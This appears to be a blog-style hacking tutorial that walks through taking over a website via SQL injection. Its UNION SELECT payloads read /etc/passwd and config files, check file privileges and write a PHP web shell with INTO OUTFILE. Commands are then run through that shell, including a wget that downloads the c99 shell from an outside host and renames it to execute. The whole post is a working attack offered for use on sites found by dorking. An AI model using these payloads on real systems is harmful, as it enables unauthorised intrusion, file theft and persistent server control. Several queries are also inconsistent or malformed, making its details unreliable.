First of all find a website which is vulnerable to sql injection you
can find websites by dorks or manually XD like i have found this.
You need 2 main things
1) Root Path of the website
2) A Writable Directory
If the vulnerable website does'nt show the root path then don't worry i will tell you how to know the root path. :D
And Also Writeable Directory.
www.site.com/index.php?id=10'
I am not starting with abc of sqli hope u know the basics :D
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--
Let's Try To Load Files Of The Website
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--
We Won't Need To Read Any Files Mentioned above just to increase your knowledge :D
Now we have to checked the file privilage for the current user for this first you have to find current username.
Like This
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--
Our Current Username is etc mine is Ch3rn0by1
Now Check File Privilages for User Ch3rn0by1
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--
If it shows Y (yes) on the vulnerable column of the website that means we have the file privilages for the current user Ch3rn0by1
And if it is'nt shows Y than Dont waste your time there :D
Ok Now we have to know the root path :D for this we have to know the software which is used in the server
you can use havij and etc/passwd and many more softwares etc/passwd is'nt a software LOL
To know the server software by file etc/passwd use this query
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('etc/passwd'),5--
now we have our server software etc (/home/Ch3rn0by1)
now read one more file.
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--
Where Ch3rn0by1 is your server software name like server name.conf :D
now we have the root path
/home/site.com/public_html etc.
Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too :D
site www.site.com/dir/*/*/*/*/
so its site.com/ch3rn0by1/writeable
now we will upload our evil code
www.site.com/index.php?id=10 UniOn SeleCt 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+
ok now we have to execute our commands
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a
Now we will use wget command to upload our evil script
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt
Now we will rename our c99.txt to php in order to execute it :D
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php
now open it
www.site.com/Ch3rn0by1/writeable directory/c99.php
Thanks
0 comments:
Post a Comment